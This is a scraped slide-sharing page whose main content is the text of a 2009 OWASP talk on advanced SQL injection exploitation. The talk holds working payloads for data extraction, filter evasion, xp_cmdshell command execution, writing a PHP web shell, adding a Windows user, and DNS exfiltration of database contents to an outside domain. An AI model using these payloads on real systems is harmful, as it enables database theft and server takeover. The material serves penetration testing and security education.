Solving Performance Problems Using MySQL Enterprise Monitor
 
Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...
Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...
Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...
 
[Strukelj] Why will Java 7.0 be so cool
[Strukelj] Why will Java 7.0 be so cool[Strukelj] Why will Java 7.0 be so cool
[Strukelj] Why will Java 7.0 be so cool
 
D Trace Support In My Sql Guide To Solving Reallife Performance Problems
D Trace Support In My Sql Guide To Solving Reallife Performance ProblemsD Trace Support In My Sql Guide To Solving Reallife Performance Problems
D Trace Support In My Sql Guide To Solving Reallife Performance Problems
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
Terracotta Java Scalability - Stateless Versus Stateful Apps
Terracotta Java Scalability - Stateless Versus Stateful AppsTerracotta Java Scalability - Stateless Versus Stateful Apps
Terracotta Java Scalability - Stateless Versus Stateful Apps
 

Último

MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxMULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxAnupkumar Sharma
 
ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4MiaBumagat1
 
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)lakshayb543
 
What is Model Inheritance in Odoo 17 ERP
What is Model Inheritance in Odoo 17 ERPWhat is Model Inheritance in Odoo 17 ERP
What is Model Inheritance in Odoo 17 ERPCeline George
 
Transaction Management in Database Management System
Transaction Management in Database Management SystemTransaction Management in Database Management System
Transaction Management in Database Management SystemChristalin Nelson
 
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17Celine George
 
4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptxmary850239
 
Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Celine George
 
Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...Seán Kennedy
 
Activity 2-unit 2-update 2024. English translation
Activity 2-unit 2-update 2024. English translationActivity 2-unit 2-update 2024. English translation
Activity 2-unit 2-update 2024. English translationRosabel UA
 
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdfVirtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdfErwinPantujan2
 
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...JojoEDelaCruz
 
Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4JOYLYNSAMANIEGO
 
Concurrency Control in Database Management system
Concurrency Control in Database Management systemConcurrency Control in Database Management system
Concurrency Control in Database Management systemChristalin Nelson
 
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptxAUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptxiammrhaywood
 
Food processing presentation for bsc agriculture hons
Food processing presentation for bsc agriculture honsFood processing presentation for bsc agriculture hons
Food processing presentation for bsc agriculture honsManeerUddin
 
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...Nguyen Thanh Tu Collection
 
Music 9 - 4th quarter - Vocal Music of the Romantic Period.pptx
Music 9 - 4th quarter - Vocal Music of the Romantic Period.pptxMusic 9 - 4th quarter - Vocal Music of the Romantic Period.pptx
Music 9 - 4th quarter - Vocal Music of the Romantic Period.pptxleah joy valeriano
 
4.18.24 Movement Legacies, Reflection, and Review.pptx
4.18.24 Movement Legacies, Reflection, and Review.pptx4.18.24 Movement Legacies, Reflection, and Review.pptx
4.18.24 Movement Legacies, Reflection, and Review.pptxmary850239
 
Active Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdfActive Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdfPatidar M
 

Último (20)

MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxMULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
 
ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4
 
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
 
What is Model Inheritance in Odoo 17 ERP
What is Model Inheritance in Odoo 17 ERPWhat is Model Inheritance in Odoo 17 ERP
What is Model Inheritance in Odoo 17 ERP
 
Transaction Management in Database Management System
Transaction Management in Database Management SystemTransaction Management in Database Management System
Transaction Management in Database Management System
 
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
 
4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx
 
Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17
 
Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...
 
Activity 2-unit 2-update 2024. English translation
Activity 2-unit 2-update 2024. English translationActivity 2-unit 2-update 2024. English translation
Activity 2-unit 2-update 2024. English translation
 
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdfVirtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
 
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...
 
Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4
 
Concurrency Control in Database Management system
Concurrency Control in Database Management systemConcurrency Control in Database Management system
Concurrency Control in Database Management system
 
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptxAUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
 
Food processing presentation for bsc agriculture hons
Food processing presentation for bsc agriculture honsFood processing presentation for bsc agriculture hons
Food processing presentation for bsc agriculture hons
 
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
 
Music 9 - 4th quarter - Vocal Music of the Romantic Period.pptx
Music 9 - 4th quarter - Vocal Music of the Romantic Period.pptxMusic 9 - 4th quarter - Vocal Music of the Romantic Period.pptx
Music 9 - 4th quarter - Vocal Music of the Romantic Period.pptx
 
4.18.24 Movement Legacies, Reflection, and Review.pptx
4.18.24 Movement Legacies, Reflection, and Review.pptx4.18.24 Movement Legacies, Reflection, and Review.pptx
4.18.24 Movement Legacies, Reflection, and Review.pptx
 
Active Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdfActive Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdf
 

Owasp Au Rev4

  • 1. Recent Advancements In SQL Injection Exploitation Techniques Sumit Siddharth sid@notsosecure.com www.notsosecure.com OWASP Education Project Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org Friday, March 13, 2009
  • 2. About Myself Penetration Tester @Portcullis Computer security LTD (U.K) 4+ Years in Penetration Testing Speaker at a number of conferences Few white papers, advisories, articles and Tools my blog http://www.notsosecure.com I once slept for 20 hours without being under the influence of any OWASP 2 intoxicating substance....:) Friday, March 13, 2009
  • 3. Agenda SQL Injection Identification  SQL Injections which automated tools will find  SQL Injections which automated tools will not find  Useful Tips Exploitation  Advanced Exploitation Techniques  Real Life Scenarios  Useful Tips Demos/Videos/Screenshots Tool Release(bsqlbf v2.2) OWASP 3 Friday, March 13, 2009
  • 4. So What is SQL Injection Unsanitized user input used in SQL Calls SQL Calls can be altered to achieve:  Return sensitive information(Confidentiality)‫‏‬  Execution of system code  Data can be altered(Integrity)‫‏‬  Data can be destroyed(Availability)‫‏‬ Example: sql = quot;SELECT password FROM users WHERE username = ‘ quot; + sUser + quot; ‘ quot; sql = quot;SELECT password FROM users WHERE username = ‘A‘ OR 1 =1 -- ‘ OWASP 4 Friday, March 13, 2009
  • 5. Useful Error Messages Works for MS-SQL and Oracle. Error returns information ‣ e.g. vuln.asp?name= ' and 1=convert(int, @@Version)-- Metadata(MSSQL) Information_schema.columns: table_name, column_name sysobjects, syscolumns Returning more than one row MS-SQL  select convert(int, (SELECT table_name+'::'+column_name+ ', ' + FROM information_schema.columns FOR XML PATH ('') )) Restriction Error messages restricted to 2048 chars [SQL Server 2005] OWASP 5 Friday, March 13, 2009
  • 6. Error Message In MS-SQL OWASP 6 Friday, March 13, 2009
  • 7. Oracle Error Messages e.g. vuln.jsp?name= ' and 1=utl_inaddr.get_host_name( (select banner from v$version where rownum=1) )-- Metadata: user_tab_columns: table_name, column_name Returning more then one row: ' and 1=utl_inaddr.get_host_name(select sys.stragg(distinct banner)||' ' from v $version)–[Oracle 11g only] SELECT SUBSTR (SYS_CONNECT_BY_PATH (banner , ','), 2) csv FROM (SELECT banner , ROW_NUMBER () OVER (ORDER BY banner ) rn, COUNT (*) OVER () cnt FROM v$version) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn + 1 [All versions] Error message restricted to 512 chars [Oracle] ORA-01489: result of string concatenation is too long OWASP 7 concatenated string value cannot exceed 4000 characters Friday, March 13, 2009
  • 8. Error Messages In Oracle OWASP 8 Friday, March 13, 2009
  • 9. Union Queries Must have same number of columns and same data types Identifying number of columns and data types: Order by  Order by clause e.g. select f_name, l_name, email from user where id=4 order by 1  Error ”The ORDER BY position number 4 is out of range of the number of items in the select list”.  Problem: Order by a certain field is not permitted e.g. clob field in oracle Using Nulls  Brute forcing nulls... e.g. vulnerable.asp?id=1 union all select null, null, null--[ use sqlmap]  Problem: A column in a table can be specified not null Using Integers  e.g. select first_name, last_name, email from user where id=4 union all select 1,2,3--  takes less character(if input length restriction is enabled)  accepted as datatypes varchar(), int etc OWASP Hybrid/Combination generally works 9 Friday, March 13, 2009
  • 10. When Union Won’t work Application selects only one row from SQL Query Injection can’t control the first row returned common bypass examples: –select first_name, last_name, email from user where id= -9999 union select 1,2,3-- –select first_name, last_name, email from user where id= 100 limit 0 union select 1,2,3-- Union after order by, group by not allowed Injection not in SELECT statement OWASP 10 Friday, March 13, 2009
  • 11. Black Listing/ IPS Bypass SeLEcT PaSSwD FroM usErs(Mixed case, space and Tab separated) SeLeCT/**/pASsWD/**/fROm/**/UsErS space delimiter restriction bypass ASP’s request.querystring strips % if not followed by 2 valid hex chars: DEC%LARE%20@S%20VAR%CHAR(4000)%3BS%ET%20@S%... DECLARE @S VARCHAR(4000);SET @S... ‘; EXEC ('SEL' + 'ECT US' + 'ER')  ‘;exec ('sel'+'ect/**/u'+'ser'); Hex Encoding [e.g. SQL Injection Worm] OWASP 11 Other Encodings Friday, March 13, 2009
  • 12. MS-SQL 2000 & xp_cmdshell stored procedure in MS SQL allows system code SQL 2000 by default run as system is_srvrolemember(‘sysadmin’)>0 Privilege escalation/brute force via Openrowset Openrowset  ‘;select 1 from openrowset('sqloledb','';'sa';'password','select 1;waitfor delay ''00:00:30'' ');-- uploading netcat  uploading via TFTP  the vulnerable ms-sql should have tftp client  database must have internet connection  database should not have outbound traffic filtering ‣ upload netcat via sql injection ‣ upload nc as hex, convert hex to binary and dump it out as a file; ‣ SQL Ninja does a good job OWASP 12 ‣ Can also use meterpreter Friday, March 13, 2009
  • 13. Not quite the same in 2005  openrowset generally not available  xp_cmdshell disabled by default  use sp_configure to enable xp_cmdshelll  'network service' not system  Token Kidnapping issue in Windows  “if you can run code as network service you can run code as system”..Ceaser OWASP 13 Friday, March 13, 2009
  • 14. So, What to do if you are not ‘sa’ if not ‘sa’ then use ‘sp_who’ to enumerate SQL/Windows/Domain users [Mixed mode authentication]. http://127.0.0.1/sqlinjection/?qid=1;BEGIN TRY exec sp_who 'TEST-SYSTEMblah' END TRY BEGIN CATCH return END CATCH waitfor delay '00:00:20'-- Make the SQL server connect to your SMB server(send pre calculated NTLM challenge) and then capture the NTLM response [xp_dirtree] crack the NTLM session hash from the response. Demo OWASP 14 Friday, March 13, 2009
  • 15. Executing system code with Mysql Load_file and outfile user must have FILE privileges load_file: file must be world readable outfile: create new files in any directory where the MySQL server has write access. under unix mysql generally runs as ‘mysql’ user; under windows as ‘system’ select load_file(‘/etc/passwd’) when gpc_magic_quote is enabled use hex encoding e.g. select load_file( 0x2f6574632f706173737764) read source code select load_file(‘/var/www/index.php’) into outfile ‘var/www/index.txt’ select into outfile create php shell in web root OWASP 15 select ‘<?php passthru($_GET[1]);?>’ into outfile ‘/var/www/owned.php’ Friday, March 13, 2009
  • 16. Code execution with Mysql...continued windows + php PHP code execution generally restricted under windows Warning: system() [function.system]: Unable to fork insufficient permissions to execute system calls in the web server environment. select ‘net user pwned pwn3d /add’ into outfile ’C:Documents and SettingsAll UsersStart MenuProgramsStartuppwned.bat’ Unix: ssh public/private Keys, .rhosts file weak permissions e.g. apache with mod_userdir OWASP 16 Friday, March 13, 2009
  • 17. Problems with automated Scanning Injection Fields GET, POST, COOKIES HTTP REFERRER Other Areas What About ACCEPT-LANGUAGE header? Application decoding user’s input(especially in cookies): base64 decode  $admin = base64_decode($admin);  [e.g. php nuke auth.php] url decode  $cookie = explode('; ', urldecode(empty($_POST['cookie']) ;  [e.g. wordpress admin-ajax.php] OWASP Hex decode 17 Friday, March 13, 2009
  • 18. Examples... Search Functionality(intelligent input to reveal all possible vulnerable areas) OWASP 18 Friday, March 13, 2009
  • 19. What About DOS!! USING ‘OR’ UPDATE USERS SET PASSWORD=md5($_POST[‘pwd’]) where username= $_POST[‘uname’]; Change Password, Registration functionality etc. Delete query Delete account, Delete Credit Card Information etc. CPU Intensive e.g. benchmark() function OWASP 19 Friday, March 13, 2009
  • 20. Blind SQL Injection Boolean Logic True And False vulnerable.php?id=100 AND 1=1 vulnerable.php?id=100 AND 1=2 Exploitation: Substring functions e.g. vulnerable.php?id=100 AND ASCII((substring($sql),$position,1))>128 Exploitation is Similar across all databases OWASP 20 Friday, March 13, 2009
  • 21. Blind SQL Injection...Same response Same response e.g. Injection in INSERT/UPDATE/DELETE statements even if in SELECT statements; in fields other than WHERE clause Exploit Techniques Time Delay functions:  waitfor delay(ms-sql)  benchmark (mysql)  dbms_lock.sleep(Oracle)  pg_sleep(Postgres) Bsql hacker Automated Tools not very efficient in spotting these OWASP 21 Friday, March 13, 2009
  • 22. True And Error True: SQL syntax is correct Error: SQL syntax is incorrect When possible convert time delay into blind less requests less CPU intensive Automated tools generally fail to flag this Can Use Time delay function, but not very effective OWASP 22 Friday, March 13, 2009
  • 23. If/Case Statement • mysql> select passwd from user where id=1; +------------+ | passwd | +------------+ | ahsadh@#$% | +------------+ • mysql> select passwd from user where id=(select case when (1=1) then 1 else 1*(s elect table_name from information_schema.tables)end); +------------+ | passwd | +------------+ | ahsadh@#$% | +------------+ 1 row in set (0.00 sec) • mysql> select passwd from user where id=(select case when (1=2) then 1 else 1*(s elect table_name from information_schema.tables)end); ERROR 1242 (21000): Subquery returns more than 1 row Error is now our False response OWASP 23 DEMO Friday, March 13, 2009
  • 24. Order by, Group by • mysql> select id, passwd from user order by 1; +------+------------+ | id | passwd | +------+------------+ | 1 | ahsadh@#$% | -------------------------- • mysql> select id, passwd from user order by (select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end) +------+------------+ | id | passwd | +------+------------+ | 1 | ahsadh@#$% | -------------------------- • mysql> select id, passwd from user order by (select case when (1=2) then 1 else 1*(select table_name from information_schema.tables)end) ERROR 1242 (21000): Subquery returns more than 1 row Use True And Error OWASP 24 Friday, March 13, 2009
  • 25. True And Error Syntax Ms-sql select case when( 1=1) then 1 else 1/0 end Error: Divide by Zero Mysql: select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end) Error: Sub query returns more than one row Postgres:  SELECT CASE WHEN (1=2) THEN 1 ELSE 1/0 END; Error: Divide by zero Oracle: select case when user='SYS' then 1/0 else (select 1 from dual) end from dual Error: Divide by zero OWASP 25 Friday, March 13, 2009
  • 26. Injection in Limit and OFFSET $query=quot;select table_name as foo FROM information_schema.tables limit quot;. $gdata; $query=quot;select table_name as foo FROM information_schema.tables limit 1 offset quot;. $gdata; Exploitation: SELECT table_name as foo FROM information_schema.tables limit 0 union all select foo from bar-- SELECT table_name as foo FROM information_schema.tables limit 1 OFFSET 999999 union all select foo from bar-- OWASP 26 Friday, March 13, 2009
  • 27. Injection In LIMIT & OFFSET LIMIT e.g. select foo from bar limit $_GET[‘id’] Boolean Logic does not work UNION Works Limit the original select to 0 rows to ensure union’s result is displayed OFFSET select foo from bar limit 1 OFFSET $_GET[‘id’] Boolean Logic does not work Union Works Make the offset very large to ensure union’s result is displayed Can also use the CASE within union to convert it into True and Error condition[if blind] e.g. insert into logs values((select data from user_logs limit 1 OFFSET $offset)) OWASP 27 Friday, March 13, 2009
  • 28. Lets get some numbers then.... Inurl:orderby Inurl:sortby Inurl:groupby, Inurl:start, Inurl:offset, Inurl:limit, etc... OWASP 28 Friday, March 13, 2009
  • 29. bsqlbf v 2.2 Blind injection True & False (Type: 0) True & Error(Type: 1) Injection in order by(Type: 2) Databases MS-SQL(0) Mysql(1) Postgres(2) Oracle(3) Unless you know what you are doing, it won't do anything.. :( OWASP 29 Friday, March 13, 2009
  • 30. Out Of Band Channels(OOB) Extracting Data over other channels(e.g. DNS) MS-SQL And Oracle provides OOB functionality which is available to “public” MSSQL[2000&2005] xp_dirtree, xp_fileexists,xp_getfiledetails, sp_add_jobstep e.g. http://victim/exp.asp?name=blah';BEGIN DECLARE @r varchar(8000) SET @r=':' SELECT @r=@r+'.'+name FROM sysobjects WHERE xtype='U' AND name>@r end;DECLARE @x as varchar(8000);SET @x=''+SUBSTRING(@r,1,200)+'.test.notsosecure.comx';EXEC master..xp_DIRTREE @x– Oracle utl_http, utl_tcp, httpuritype e.g. http://victim/vulnerable.php?id=1,200 and(SELECT UTL_INADDR.get_host_address((SELECT user from dual)||'.a.notsosecure.com')+FROM+dual)+is+not+null-- Mysql + windows select load_file(concat('foo6.',(select 'test'),'.notsosecure.com','a.txt')); also perform NTLM attacks however, mysql generally run as system(slide 15) Demo OWASP 30 Friday, March 13, 2009
  • 31. Fun with Oracle's UTL_HTTP, HTTPURITYPE Not Just resolve names, make TCP connections and use it as a HTTP proxy Hack internal networks Bypass IP restrictions Cross Site Scripting and SQL Injections on internal network with httpuritype and utl_http How about returning a cmd shell from an internal MS-SQL server through Oracle SQL Injection!!!!!!(Demo) OWASP 31 Friday, March 13, 2009
  • 32. Thanks Questions...? sid@notsosecure.com OWASP 32 Friday, March 13, 2009
  • 33. References  http://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt http://blogs.technet.com/neilcar/archive/2008/10/31/sql-injection-hijinks.aspx  http://www.pentestmonkey.net  SQL Ninja(http://sqlninja.sourceforge.net/)  SQL Map(sqlmap.sourceforge.net/)  OOB Defcon Talk: www.inspectit.se/dc15/Defcon_15_Presentation_Web.pdf  Bsql Hacker: (http://labs.portcullis.co.uk/application/bsql-hacker/)  Alexander Kornburst’s blog  SFXSqli paper (http://www.securityfocus.com/archive/1/500764)  ngs’s white papers   http://www.argeniss.com/research/TokenKidnapping.pdf Everything else on the internet related to SQL injection  OWASP 33 Friday, March 13, 2009
  • 34. Input length restriction(deleted) MS-SQL e.g. vulnerable.asp?id=-1 union all select 1,2,3,4,5,6,long_column_name from long_table_name; – [may be too long] vulnerable.asp?id=1;select * into xx from long_table_name; vulnerable.asp?id=1;exec sp_rename 'xx.long_column_name','xx.tn'; vulnerable.asp?id=-1 union all select 1,2,3,4,5,6,tn from xx– OWASP 34 Friday, March 13, 2009

Notas del editor